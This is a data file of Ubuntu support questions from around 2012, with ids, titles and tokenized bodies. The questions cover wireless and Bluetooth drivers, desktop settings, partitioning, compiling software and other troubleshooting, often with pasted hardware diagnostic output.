113205	how to use julius on 11.10	i like to set a speech recognition on my laptop and i try julius but i have no idea how to use it . can any body help or point me on the right direction thanks
113207	ca n't bind gnome-do to super + space or ctrl+alt+space	with today 's updates to 12.04 i can no longer bind gnome-do to either ctrl+alt+space or super+space . with 11.10 it was n't possible to use super+space , on a fresh install of 12.04 super+space was working properly . today it stopped working , if i try to bind control+alt+space then the controlkey shows up in the keyboard binding as primary . i am running unity , which in the past blocked super+space , it seemed to have stopped blocking it on 12.04 . it should n't affect ctrl+alt+space . configuring either binding produces the following error in the gnome-do output : libdo-warning ** : binding 'space ' failed ! libdo-warning ** : binding 'space ' failed ! i 'm stuck binding to shift+alt+space .
113208	compatibility of new acer aspire m3 with nvidia gt 640m kepler gpu with hybrid graphics ?	a new acer aspire m3 with nvidia gt 640m kepler gpu ( nvidia optimus ) has been announced : http : //www.theverge.com/2012/3/13/2868854/acer-aspire-timeline-ultra-m3-announce-kepler-gt-640m [ ... ] the company claims the ultra m3 can still manage eight hours of battery life for normal tasks using nvidia 's optimus graphics switching solution [ ... ] any ideas if this model should be linux hybrid-graphics compatible given the graphics card in it ? are the proprietary nvidia linux drivers going to be working for it ? should bumblebee work for it ?
113209	is there any ubuntu server for i486 architecture ?	i have a very weak machine ( i486 with 512 mb of ram ) and want to install last ubuntu server release on it . when i try to install ubuntu server 11.10 ( 32 bit ) , installer says the architecture needed is i586 but only found cpu is an i486 . if there is no i486 ubuntu available , how can i recompile kernel with i486 optimization and replace it with default kernel of installer ?
113216	bcm4313 bluetooth not working on 64-bit oneiric ( wireless does )	i just installed oneiric on the hp dm1-4142nr ( amd e-450 ) notebook and with a bit of tweaking everything appears to work except the bluetooth ( bt ) . after some researching i found that bt is a part of the dreaded broadcom hybrid bcm4313 hardware that supposedly supplies both . here 's what i 've tried so far : in all tests the hardware key ( f12 ) has been enabled and the top toolbar shows a bluetooth icon as well as wireless icon ( single key press toggles both bt and wifi on/off ) . i am currently using linux-3.0.0-13-lowlatency kernel but this should have any bearing on the problem as i also tried downloading latest broadcom driver ( hybrid-portsrc_x86_64-v5_100_82_112.tar.gz ) from the broadcom site and successfully built it according to their instructions . i tried both the brcmsmac driver and the wl driver . wl driver solves the poor range problem as well as f12 led light color change ( which does not occur when using the brcmsmac driver ) to reflect the enabled state . other than that they both have exact same behavior in respect to this problem . in all tests at first `` rfkill list '' did not show any bluetooth devices , until i manually modprobed btusb . now it lists the following devices : 1 : hp-wifi : wireless lan soft blocked : no hard blocked : no 2 : hp-bluetooth : bluetooth soft blocked : no hard blocked : no 6 : brcmwl-0 : wireless lan soft blocked : no hard blocked : no enabling/disabling devices is properly reflected in the aforesaid list ( hard blocked value changes to yes/no ) . `` hcitool dev '' shows no available devices . `` hcitool -i hp-bluetooth '' yields : invalid device : no such device curiously , `` lsusb '' shows no bluetooth devices : bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 006 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 002 : id 064e : d217 suyin corp . bus 006 device 002 : id 0a5c:21e3 broadcom corp . bus 002 device 002 : id 152d:2339 jmicron technology corp. / jmicron usa technology corp. top toolbar shows bluetooth being enabled . right-clicking on it and selecting properties ( that opens bt system settings ) shows bluetooth being disabled and trying to enable it simply reverts back to disabled within a second or two . the only lead i found so far is that some were able to enable bt in windows ( on dual-booting computers ) and then rebooted into linux at which point bt worked ok . i however do not have a dual-boot on this machine . besides , having to boot into windows every time before linux just to `` fix '' bluetooth seems hardly like a fix . i did find another thread with a user in identical situation ( no dual boot ) and no solution to the said problem . based on this , however , it seems to me there might be some kind of a firmware missing ? also , has anyone tried ndiswrapper for this setup in hope that might fix the bt issue ? if so , is the wifi stable ? any insight in this matter is greatly appreciated !
113225	accidentally deleted icons in /usr/share , how do i get them back ?	okay , so tyeing to type `` icons '' in the /usr/share/ directory , hit the delete key as root , now my icons are gone , all of them , the options for play in totem or the ones on the desktop ... .all of them , any help ?
113227	find cluster size of in ubuntu in 11.04	i am running ubuntu 11.04 and i am wondering how to find the size of the size of the allocation unit ? is there a command in ubuntu to find this ? also depending on the size of the allocation unit does the total amount of hard disk space used a file change ? i have checked the file sizes using `` ls '' and `` du -b '' and in both the cases i am getting the same values . including data : sudo tune2fs -l < file system > block count : 8052736 reserved block count : 402636 free blocks : 2797402 first block : 0 block size : 4096 reserved gdt blocks : 1022 blocks per group : 32768 inode blocks per group : 512 flex block group size : 16 reserved blocks uid : 0 ( user root ) reserved blocks gid : 0 ( group root ) journal backup : inode blocks so if the block size is 4096 bytes , files which are smaller than 4096 occupy 4096 bytes of storage on the hard disk , what about files which are larger than 4096 bytes how much space do they occupy ? is there a command to find the same ?
113231	su : authentication failure ( ignored )	keeping in mind this was working before : when i try to login as : su jira1 i get error : su : authentication failure ( ignored ) more /etc/passwd returns : jira1 : x:1003:1003 : , , , : /home/jira1 : /bin/bash and if i monitor su jira1 , by tailing /var/log/auth.log , i get : mar 15 10:43:51 jira su [ 4590 ] : successful su for jira1 by root mar 15 10:43:51 jira su [ 4590 ] : + /dev/pts/1 root : jira1 mar 15 10:43:51 jira su [ 4590 ] : pam_unix ( su : session ) : session opened for user jira1 by kahmed ( uid=0 )
113233	jalali calendar	will gnome add the jalali ( =persian=shamsi ) calendar as a default calendar , like what kde has ? i saw that kde has many calendars that can be used as default instead of gregorian calendar .
113235	how to install ubuntu in a way that does n't affect the boot proccess ?	i have a computer with windows 7 installed . i 'm sharing it with other people that do n't accept a boot screen where you choose between windows and ubuntu , but i want to be able to run ubuntu from an internal drive . is there a way for me to install ubuntu on a hdd partition without tampering with the existing boot procedure at all , and having a bootable usb thumb-drive that lets me boot up ubuntu ? please take into consideration that it 's not an option to first install ubuntu and then restoring the mbr from some sort of backup , since the other users of the computer in question are quite paranoid .
113241	about partition sizes	i am going to install ubuntu on a new computer , but i 'm not quite sure how big each partition should be . if i create only root , home and swap partitions , on what partition will programs be installed ? will they go to /home or to root ? basically does it make sense for instance to have following partitions : / - 6gb /home - 80gb /swap - 4gb is 6gb large enough for my root partition ? also are these 3 partitions a good choice , or is there a better configuration ? i have at the moment 3 operating systems installed , and i do make changes quite often .
113246	permanantly set monitor as primary	i am running ubuntu 12.04 ( beta ) with a triple head setup and gnome 3 desktop ( ie `` gnome '' selected not `` ubuntu '' at login screen ) . it seems that it handles multiple monitors by blessing one monitor to receive the activities bar , clock , login menu , etc . let 's call this the `` primary '' monitor . how do i change it ( permanently ) ? update : ok so : $ xrandr -- output dfp4 -- primary does the trick temporarily . how do i make it permanent ? i 'm using latest fglrx ati catalyst driver
113248	compiz problem with titlebar	i am using 11.10 and when i using alt+tab or win+tab when maximized wondow is selected the titlebar disapears . can anyone explain this . please help me .
113253	how can i add a command in terminal to open a file	i save a file logisim2.7.1.jar in my directory at /home/danny/application . whenever i want to run this file in terminal , i have to type these following line in terminal : cd /home/danny/application java -jar logisim.2.7.1.jar then the file will execute . my question is : instead of typing all that command line in terminal , can i just type logisim in my terminal and the file will execute ? i did this before by doing the following steps which im not sure , if you know , please correct me : create a folder called `` bin '' in home directories . create a text file inside the bin folder , and add this line java -jar logisim.2.7.1.jar then save it as logisim.txt i then edit the .bashrc file by adding this line at the bottom : path= $ path : home/familypc/bin/ after that i did something with chmod in my command line which i forgot to make terminal to look in the new bin directories . any helps ?
113256	how to build and configure kernel and file system for uml in ubuntu 11.10 ?	i saw many links for for uml but all just pointed to install uml for fedora is there a way i could config uml in ubuntu using ubuntu file system mine is a 64 bit computer .
113262	green tint on second monitor ( ubuntu only )	i 've been using ubuntu on my new laptop for a few days now and have n't had any issues i could n't resolve until today . i plugged in an hdmi cable to extend the monitor and noticed that the secondary display has a deep green hue . i tried manipulating the monitor settings , but no matter what i change it remains a deep green . i booted back into windows 7 and tested the monitor with the same hdmi cable without any issues , so this is definitely something with ubuntu . any input would be greatly appreciated . hardware : dell 14 '' / i3-2350m processor / integrated graphics / ubuntu 11.10 thanks !
113270	what exactly does zeitgeist index ?	i am not clear on this . does zeitgeist index the contents of my document so searches are more relevant ? or is zeitgeist only searching the name/extension of my documents ?
113272	how to configure brother dcp-7030 scanner ?	can i install my scanner drivers through wine , using the windows driver cd packaged with my scanner ? i am using the brother dcp-7030 scanner and my system is running ubuntu 11.10 . i need help to set up scanning . i am running ubuntu 11.10 on mac using virtual box .
113276	how can i retain my pidgin installation when upgrading to the newer versions of ubuntu ?	every time i have upgraded to the newest version of ubuntu , it removes pidgin during the upgrade and gives me empathy , i do n't want empathy , hence why i downloaded pidgin . is there a way to make it leave pidgin alone when upgrading ?
113277	ubuntu 10.04 - do i need to install audio drivers for asrock e350m1 ?	i just successfully installed the graphics driver on my asrock e350m1 -thanks daniel ! - and now i am trying to determine if there is any need to install an audio driver . audio is fine , i just do n't know if it should be better . ( i have installed the restricted codecs . ) this is the description of my audio ( from asrock ) : 7.1 ch hd audio with content protection ( realtek alc892 audio codec ) - premium blu-ray audio support . i was not able to locate any linux drivers on the realtek or the asrock site . any suggestions ?
113288	how much ram will my php application have access to on a 32bit server ?	i have a 32bit 10.04 server has 32gb ram i am running opencart e-commerce sites ( php ) max how much ram can use by opencart ? ( 32gb or 4gb ? )
113291	how do i install gcc 4.7 ?	i wish to install gcc 4.7 so that i can use some c++11 features . i downloaded the source , ran ./configure and was told i needed gmp . downloaded the code for that , hit ./configure and was told i needed m4 . but i already have m4 ( least that is what synamptic tells me ) . what is going on and how can i fix it ?
113294	ca n't sign-in into the ubuntu 12.04 's ubuntu-one app	i 'm currently testing ubuntu 12.04 beta and first of all ! great work devs ! i just have a little issue i ca n't resolve by myself ... the ubuntu-one client ! i ca n't sign-in , the button is n't active and i do n't know why ... i tried to remove all ubuntu-one system folders , remove the package , cleanup and reinstall , same stuff ... i even reinstalled the complete beta , but i 'm still blocked ... the sign-in button is inactive , even by striking enter , nothing happen ... do n't ask me if my credentials are ok , there are ! any ideas ? thanks ...
113297	broadcom bc4313	i just installed ubuntu 11.10 and i have the broadcom bc4313 wirless chipset . i ca n't get it to work ... i tried almost any guide i could find online ... http : //ubuntuforums.org/showthread.php ? t=1617380 this one looked promising , but i do n't have the brcm80211 folder , did the workaround found there , with the ~/linux-next-a694cb1 but when i try to make the file , i get an error.. a few months ago , i had the same problem and i managed to get it working somehow.. if you need more info , or posting some output or something , let me know . any help would be appreciated.. carmel edit : the lspci -v output : 00:00.0 host bridge : intel corporation 2nd generation core processor family dram controller ( rev 09 ) subsystem : lenovo device 3975 flags : bus master , fast devsel , latency 0 capabilities : [ e0 ] vendor specific information : len=0c < ? > kernel driver in use : agpgart-intel 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) ( prog-if 00 [ vga controller ] ) subsystem : lenovo device 3975 flags : bus master , fast devsel , latency 0 , irq 42 memory at d0000000 ( 64-bit , non-prefetchable ) [ size=4m ] memory at c0000000 ( 64-bit , prefetchable ) [ size=256m ] i/o ports at 3000 [ size=64 ] expansion rom at < unassigned > [ disabled ] capabilities : [ 90 ] msi : enable+ count=1/1 maskable- 64bit- capabilities : [ d0 ] power management version 2 capabilities : [ a4 ] pci advanced features kernel driver in use : i915 kernel modules : i915 00:16.0 communication controller : intel corporation 6 series/c200 series chipset family mei controller # 1 ( rev 04 ) subsystem : lenovo device 3975 flags : bus master , fast devsel , latency 0 , irq 16 memory at d0605000 ( 64-bit , non-prefetchable ) [ size=16 ] capabilities : [ 50 ] power management version 3 capabilities : [ 8c ] msi : enable- count=1/1 maskable- 64bit+ kernel driver in use : mei kernel modules : mei 00:1a.0 usb controller : intel corporation 6 series/c200 series chipset family usb enhanced host controller # 2 ( rev 05 ) ( prog-if 20 [ ehci ] ) subsystem : lenovo device 3975 flags : bus master , medium devsel , latency 0 , irq 16 memory at d060a000 ( 32-bit , non-prefetchable ) [ size=1k ] capabilities : [ 50 ] power management version 2 capabilities : [ 58 ] debug port : bar=1 offset=00a0 capabilities : [ 98 ] pci advanced features kernel driver in use : ehci_hcd 00:1b.0 audio device : intel corporation 6 series/c200 series chipset family high definition audio controller ( rev 05 ) subsystem : lenovo device 3975 flags : bus master , fast devsel , latency 0 , irq 43 memory at d0600000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : [ 50 ] power management version 2 capabilities : [ 60 ] msi : enable+ count=1/1 maskable- 64bit+ capabilities : [ 70 ] express root complex integrated endpoint , msi 00 capabilities : [ 100 ] virtual channel capabilities : [ 130 ] root complex link kernel driver in use : hda intel kernel modules : snd-hda-intel 00:1c.0 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 1 ( rev b5 ) ( prog-if 00 [ normal decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=01 , subordinate=01 , sec-latency=0 capabilities : [ 40 ] express root port ( slot+ ) , msi 00 capabilities : [ 80 ] msi : enable- count=1/1 maskable- 64bit- capabilities : [ 90 ] subsystem : lenovo device 3975 capabilities : [ a0 ] power management version 2 kernel driver in use : pcieport kernel modules : shpchp 00:1c.1 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 2 ( rev b5 ) ( prog-if 00 [ normal decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=02 , subordinate=02 , sec-latency=0 memory behind bridge : d0500000-d05fffff capabilities : [ 40 ] express root port ( slot+ ) , msi 00 capabilities : [ 80 ] msi : enable- count=1/1 maskable- 64bit- capabilities : [ 90 ] subsystem : lenovo device 3975 capabilities : [ a0 ] power management version 2 kernel driver in use : pcieport kernel modules : shpchp 00:1c.3 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 4 ( rev b5 ) ( prog-if 00 [ normal decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=03 , subordinate=03 , sec-latency=0 i/o behind bridge : 00002000-00002fff prefetchable memory behind bridge : 00000000d0400000-00000000d04fffff capabilities : [ 40 ] express root port ( slot+ ) , msi 00 capabilities : [ 80 ] msi : enable- count=1/1 maskable- 64bit- capabilities : [ 90 ] subsystem : lenovo device 3975 capabilities : [ a0 ] power management version 2 kernel driver in use : pcieport kernel modules : shpchp 00:1d.0 usb controller : intel corporation 6 series/c200 series chipset family usb enhanced host controller # 1 ( rev 05 ) ( prog-if 20 [ ehci ] ) subsystem : lenovo device 3975 flags : bus master , medium devsel , latency 0 , irq 23 memory at d0609000 ( 32-bit , non-prefetchable ) [ size=1k ] capabilities : [ 50 ] power management version 2 capabilities : [ 58 ] debug port : bar=1 offset=00a0 capabilities : [ 98 ] pci advanced features kernel driver in use : ehci_hcd 00:1f.0 isa bridge : intel corporation hm65 express chipset family lpc controller ( rev 05 ) subsystem : lenovo device 3975 flags : bus master , medium devsel , latency 0 capabilities : [ e0 ] vendor specific information : len=0c < ? > kernel modules : itco_wdt 00:1f.2 sata controller : intel corporation 6 series/c200 series chipset family 6 port sata ahci controller ( rev 05 ) ( prog-if 01 [ ahci 1.0 ] ) subsystem : lenovo device 3975 flags : bus master , 66mhz , medium devsel , latency 0 , irq 41 i/o ports at 3088 [ size=8 ] i/o ports at 3094 [ size=4 ] i/o ports at 3080 [ size=8 ] i/o ports at 3090 [ size=4 ] i/o ports at 3060 [ size=32 ] memory at d0608000 ( 32-bit , non-prefetchable ) [ size=2k ] capabilities : [ 80 ] msi : enable+ count=1/1 maskable- 64bit- capabilities : [ 70 ] power management version 3 capabilities : [ a8 ] sata hba v1.0 capabilities : [ b0 ] pci advanced features kernel driver in use : ahci kernel modules : ahci 00:1f.3 smbus : intel corporation 6 series/c200 series chipset family smbus controller ( rev 05 ) subsystem : lenovo device 3975 flags : medium devsel , irq 10 memory at d0604000 ( 64-bit , non-prefetchable ) [ size=256 ] i/o ports at efa0 [ size=32 ] kernel modules : i2c-i801 02:00.0 network controller : broadcom corporation bcm4313 802.11b/g/n wireless lan controller ( rev 01 ) subsystem : broadcom corporation device 051b flags : bus master , fast devsel , latency 0 , irq 11 memory at d0500000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : [ 40 ] power management version 3 capabilities : [ 58 ] vendor specific information : len=78 < ? > capabilities : [ 48 ] msi : enable- count=1/1 maskable- 64bit+ capabilities : [ d0 ] express endpoint , msi 00 capabilities : [ 100 ] advanced error reporting capabilities : [ 13c ] virtual channel capabilities : [ 160 ] device serial number 00-00-da-ff-ff-2b-c0-f8 capabilities : [ 16c ] power budgeting < ? > kernel modules : bcma , brcmsmac 03:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller ( rev 06 ) subsystem : lenovo device 3975 flags : bus master , fast devsel , latency 0 , irq 40 i/o ports at 2000 [ size=256 ] memory at d0404000 ( 64-bit , prefetchable ) [ size=4k ] memory at d0400000 ( 64-bit , prefetchable ) [ size=16k ] capabilities : [ 40 ] power management version 3 capabilities : [ 50 ] msi : enable+ count=1/1 maskable- 64bit+ capabilities : [ 70 ] express endpoint , msi 01 capabilities : [ b0 ] msi-x : enable- count=4 masked- capabilities : [ d0 ] vital product data capabilities : [ 100 ] advanced error reporting capabilities : [ 140 ] virtual channel capabilities : [ 160 ] device serial number 13-00-00-00-68-4c-e0-00 kernel driver in use : r8169 kernel modules : r8169
113298	how to hide headings in nautilus	i want hide personal device network headings . left frame should display everything without hiding . how can i do that ?
113299	windows drive shows all icons with a `` x '' tagged !	this is what i 'm seeing . any help ?
113301	how to remove all i386 packages from ubuntu 64bit ?	over the time i installed many i386 packages , which i no longer need . how can i clean up the system and stay only with the amd64 packages ?
113302	ca n't search for terminal in unity dash	i used to be able to search for terminal in 'dash home ' and brings up terminal . however , this way does n't work any more . 'dash home ' does not even let me search for 'terminal ' . one thing , i have my home directory on a ntfs partition and shared with a windows 7 dual boot . i do n't know if windows 7 caused the trouble . is there anyway i can get back 'terminal ' ? without terminal , life is miserable .
113310	how to find source for a line in $ path ?	i 've got a line in my $ path that is invalid and want to delete it , but i 'm not sure where it 's coming from . it 's not being set in .bashrc , .profile , or /etc/environment . is there any way to figure out its source ? thanks !
113311	gdm2 not respecting my conf setting , default blank theme . lucid openbox no gnome-settings-daemon	i 'm running lucid and openbox , also i dont use gnome-settings-daemon . i really want to set a background and gtk theme + icons for gdm2 . i have been through the gonf settings , for example , sudo -u gdm gconftool-2 -- set -- type string -- set /desktop/gnome/background/picture_filename /usr/share/backgrounds/ebrit.png if it is relevant my arch is armel . if my gconf command should have changed my gdm background , please let me know it was correct .
113314	how do i prevent ubuntu gradually slowing down to a stop ?	i really do not know what is causing the problem of my desktop environment ( d.e . ) gradually slowing down . it seems to happen in gnome 3.2 , lxde , xfce , and kde . i am running ubuntu 11.10 and this problem started happening from a fresh install . i have noticed that if i restart gnome or otherwise re-log-in with any of the d.e.s the speed resets to normal . i do n't seem to have and memory leaks that account for it and there are not any processes that are using excessive cpu cycles . due to the symptoms i am guessing that there is an underlying package that interacts with all d.e.s that is the source of the problem . just to clarify , in extreme situations , if i let the slowdown continue without a restart of the d.e . my system will finally get to a point where everything , even my clock , freezes . the time over which gnome slows down ( noticeably after 17 hrs ) is much less than lxde , or xfce but eventually they freeze as well . i did n't mention unity since i have n't used it enough to verify the problem , but i do n't see why it should be different . just in case this is relevant , i suspend my computer rather than turn it off . i do this because of the greatly reduced load time and the 17 hrs i stated above is actual up-time , not time where the d.e . is actually active . however , the slow down does not seem to be affected by how long the computer has been in suspend mode . i know that it is possible that this problem is due to an interaction between two or more of the applications that i use and as such it may not be able to be duplicated by others . in the end i am just wondering ( a ) are other people experiencing this issue and ( b ) does anyone have some advice on where to start looking for a solution if one is not already known . i am even open to the idea of switching to the beta release of 12.04 if anyone thinks it will solve the problem . edit : i took a video of my latest freeze that you can watch at http : //youtu.be/flkuquzcmde , sorry about the audio . edit : since that video i checked my memory for errors and tried installing the proprietary video drivers . no memory errors were found and the proprietary video drivers made the display unusable so i had to uninstall them . any thoughts ?
113315	firefox status bar not showing	i 'm using firefox 10.0.2 and the status-4-evar add-on . the status bar is n't showing , however . i 've recently installed moonlight , but i 've disabled it and still no status . now , when hovering over a link , i do n't see where it 'll lead me . any suggestions on how to recover the status bar ?
113317	ethernet works but wireless does not on lenovo w520 under ubuntu 10.10	an ubuntu newbie installed caelinux 2011 which is based on ubuntu 10.04.3 lts 64bit side-by-side with windows 7 on lenovo w520 laptop . although both ethernet and wireless cards work on windows 7 , they do not on ubuntu . the cards are intel ( r ) 82579lm gigabit network connection and intel ( r ) centrino ( r ) advanced-n 6205 , respectively . thanks to sfeole 's answer . after upgrading to 10.10 the ethernet works now . but the wireless still does not . any one can help with this ? thanks !
113318	can 12.04 be installed using btrfs only ?	in the past it was not possible to install ubuntu on a pure btrfs file system ( / btrfs + swap ) , will it be possible for 12.04 ?
113319	install japanese in kubuntu	i study japanese so it 's helpful to be able to type it on my computer . i have ibus installed and under local in settings , i installed japanese , though it only gave me the option for translations . i went into ibus and tried to add japanese , the option was there but ca n't be selected . how do i fix this ?
113325	how to force download on one network and upload on another	lets say that i have an apache server running , and two network cards . each card is connected to a different network . c1 is connected to n1 , which is an adsl connection with the port 80 open ( so i can reach my server from oustide my lan ) . c2 is connected to n2 , which is a [ very fast ] corporate network ( no ports open or routes allowed ) . how could my server take advantage of c2n2 bandwidth ? would forcing download on one network and upload on another help ? edit 1 : what about bonding ( seen here : two ethernet ports on motherboard . how can i get double the bandwidth ? ) ? would it help ?
113336	change ubuntu one and one-conf sync account	i 've made a mistake and created a second account in ubuntu sso with my new email account and now i want to change it from the one-conf and from my ubuntu one account . i ca n't find where to change the account in neither apps . any hints ?
113338	how much cpu heat when playing music is normal ?	i just wanted to ask , if it is normal , that i get around 72째 c when playing music in rhythmbox , if the temperature in complete idle is around 52째 . the cpu usage of the player is around 5 % . i have an acer aspire laptop with core i5 is this temperature a normal value for playing media in linux or is something wrong with my fan , or the paste between cpu and cooling system ? or could it be a software/kernel/driver problem ? the answer , if it is normal , already helps alot ( do n't want to be paranoid ) i use oneiric 64 bit gnome-shell
113339	compile new kernel for ubuntu 11.10	my laptop is hp dv6 6080 with sandy bridge cpu . linux has power issue and use more battery but i see in sites that new kernel does n't has this problem . is this true ? if i compile this kernel for ubuntu 11.10 can i solve this problem ? i use techniques for decreasing battery use in linux but linux use many battery as windows use low than linux ! how can i solve this problem in linux ?
113340	ubuntu 11.10 , replacing unity with gnome	today i 've decided to replace unity with gnome . i used the `` gnome-session-fallback '' . my question is : is a fallback safe/effective in the long run ? i was told that i can actually use some commands and get rid of unity totally and replace it with gnome . is it true that replacing means more available things ( compared to a gnome fallback ) ? i was wondering what the real difference is between a fallback and a new installation of gnome .
113349	getting wireless to work on ubuntu 11.10 ( on a mac machine )	i have a 2008 white 13.3 inch macbook that now solely runs ubuntu . however , i can not get wifi or cable to work on it . regarding the cable , it atleast tries to connect but eventually disconnects from the wired network . here is the output for lspci ( pastebin ) i tried installing b43-fwcutter and firmware-b43 but get errors . ( i loaded them from a thumb drive and tried sudo dpkg -i ) . i can not understand these instructions from the documentation , as i can not locate the pool directory . b43-fwcutter is located on the ubuntu install media under ../pool/main/b/b43-fwcutter/ and patch is located under ../pool/main/p/patch/ or both in the official repositories online . note : in some versions ( 10.04 and 11.04 at least ) there is not a /pool/main/p/patch/ if this file is missing then you do n't need it . in this case you only need to install /pool/main/b/b43-fwcutter by following the instructions below . further information : > uname -m linux monadist-macbook 3.0.0-12-generic # 20-ubuntu smp fri oct 7 14:56:25 utc 2011 x86_64 x86_64 x86_64 gnu/linux > rfkill list all 0 : phy0 : wireless lan soft blocked : no hard blocked : no 2 : hci0 : bluetooth soft blocked : no hard blocked : no > sudo lshw -class network pci ( sysfs ) *-network description : network controller product : bcm4321 802.11a/b/g/n vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:02:00.0 version : 03 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : driver=b43-pci-bridge latency=0 resources : irq:16 memory : d0500000-d0503fff memory : d0000000-d00fffff *-network description : ethernet interface product : 88e8058 pci-e gigabit ethernet controller vendor : marvell technology group ltd. physical id : 0 bus info : pci @ 0000:03:00.0 logical name : eth0 version : 13 serial : 00:1b:63 : aa:82 : c8 size : 100mbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm vpd msi pciexpress bus_master cap_list rom ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=sky2 driverversion=1.28 duplex=full firmware=n/a latency=0 link=yes multicast=yes port=twisted pair speed=100mbit/s resources : irq:43 memory : d0400000-d0403fff ioport:2000 ( size=256 ) memory : d0800000-d081ffff *-network disabled description : wireless interface physical id : 2 logical name : wlan0 serial : 00:1d:4f : fa : a7:52 capabilities : ethernet physical wireless configuration : broadcast=yes driver=b43 driverversion=3.0.0-12-generic firmware=n/a link=no multicast=yes wireless=ieee 802.11bg i have the appropriate b43-fwcutter and firmware-b43 deb files loaded in my home directory . however , when i try : $ sudo dpkg -i b43-fwcutter_011-5_amd64.deb i get the error ( reading database ... 124194 files and directories currently installed . ) preparing to replace b43-fwcutter 1:011-5 ( using b43-fwcutter_011-5_amd64.deb ) ... unpacking replacement b43-fwcutter ... setting up b43-fwcutter ( 1:011-5 ) ... -- 2012-03-27 09:49:07 -- http : //downloads.openwrt.org/sources/wl_apsta-3.130.20.0.o resolving downloads.openwrt.org ... failed : name or service not known . wget : unable to resolve host address `downloads.openwrt.org' dpkg : error processing b43-fwcutter ( -- install ) : subprocess installed post-installation script returned error exit status 4 processing triggers for man-db ... errors were encountered while processing : b43-fwcutter while installing firmware : [ ~ ] $ sudo dpkg -i firmware-b43-installer_4.150.10.5-4_all.deb [ sudo ] password for username : ( reading database ... 124194 files and directories currently installed . ) preparing to replace firmware-b43-installer 4.150.10.5-4 ( using firmware-b43-installer_4.150.10.5-4_all.deb ) ... deleting old extracted firmware ... unpacking replacement firmware-b43-installer ... dpkg : dependency problems prevent configuration of firmware-b43-installer : firmware-b43-installer depends on b43-fwcutter ( > = 1:012 ) ; however : version of b43-fwcutter on system is 1:011-5. dpkg : error processing firmware-b43-installer ( -- install ) : dependency problems - leaving unconfigured errors were encountered while processing : firmware-b43-installer
113352	i need help choosing hardware upgrades to get ubuntu 12.04 3d to run	i have a dell dimension 3000 ram : 512 mib cpu : intel速 pentium ( r ) 4 2.80ghz graphics : intel速 865g x86/mmx/sse2 what do i have to upgrade to run ubuntu 12.04 3d .
113363	ca n't download files	i 'm trying to put skype and yahoo messenger onto my acer eee note book and the system keeps asking me to give administrator rights and then a password which i ca n't remember . i tried to change the password and when it comes to typing , i ca n't . i 'm the only one that uses it , so i 'd like to make it open.how please ?
113364	disable sound output device in 12.04 ?	i need to be able to disable a sound device in 12.04 . i was able to do this in 11.10 using the sounds setting app , and it worked like a charm . the new sound settings app does n't seem to have the capability of outright disabling an output device . i 'm trying to disable a amd hdmi sound device associated with my radeon hd 6870 video card . thanks for any advice !
113366	screen goes black when trying to install ubuntu	trying to re-install ubuntu 11.10 on an hp pavilion g6 . screen goes black after the ubuntu logo shows . how do i get it to install normally ? installed ubuntu 11.10 successfully without my wireless device being recognized . used sudo apt-get update + upgrade commands to attempt to fix this . computer crashes after upgrade and now it wo n't finish re-installing ubuntu . after it shows the first purple screen with the ubuntu logo , the screen goes black . used the darik 's boot and nuke cd and then attempted re-installation again , and the black screen problem remains consistent , seemingly no matter what i do . it sounds like it 's installing but wo n't let me see anything or go anywhere .
113367	install self-compiled libraries in ubuntu	whats the recommended way to install self-compiled libraries ? the libraries are supposed to replace existing ubuntu packages . of course i want that the apt dependencies to be fullfilled . the sources for the libraries are not the ones provided by ubuntu . and i want other software to find the libraries so i would put them into the same path by overwriting existing files provided by the corresponding packages . is this too dirty ? specifically i want to compile webkit libraries for qt since the ones provided by kubuntu are way too old .
113373	new computer system , not sure how to use it , how do i get my old one back ?	my hard drive was dying so it needed to be replaced . i got a new one and when i got it has this new system on it , but it 's very complicated to use . is there a way i can get it back the the way my old one was ? this new one does n't seem very customizable at all . one thing that bothers me is that there is no bottom taskbar , so i ca n't see any windows i have open .
113379	suspend and wake pc at certain time	i want my pc to sleep at 04:58 and wake at 05:15 , every day . how do i do that ?
113381	how can i get my webcam to work in icanhazchat ?	i can cam up in cheese and skype , but ca n't in icanhazchat . i can even see the other cams . what do i do ? i have a gateway laptop ( basically acer ) with a suyin 1.3mp .
113384	11.04 loses wan but not lan connectivity	at apparently decreasing intervals my 11.04 system loses wan ( outside internet ) connectivity . its hardware connection is via a wireless adapter which connects to the system via ethernet ; thus the system sees an ethernet connection . when the problem occurs , there is no loss of connection to other hosts on the lan , and another host on the lan has wan connectivity . rebooting the 11.04 system cures the problem , at least for a while . in the problem state : ping www.apple.com -- ( from 11.04 system ) produces no output ping www.apple.com -- ( from mac os system on the lan ) produces normal output ping 192.168.168.1xx -- ( from 11.04 ; ip=another host on lan ) produces normal output ping 192.168.168.1 -- ( from 11.04 ; ip=router 's lan address ) produces no output my usual way of communicating with the 11.04 system , ssh from another host on the lan , continues to operate normally 11.04 chromium browser just spins the mouse pointer when attempting to contact www.google.com ifconfig looks ok netstat -r looks ok it 's as if the router suddenly decides to block wan access by the problem system . ideas or suggestions for diagnosing ?
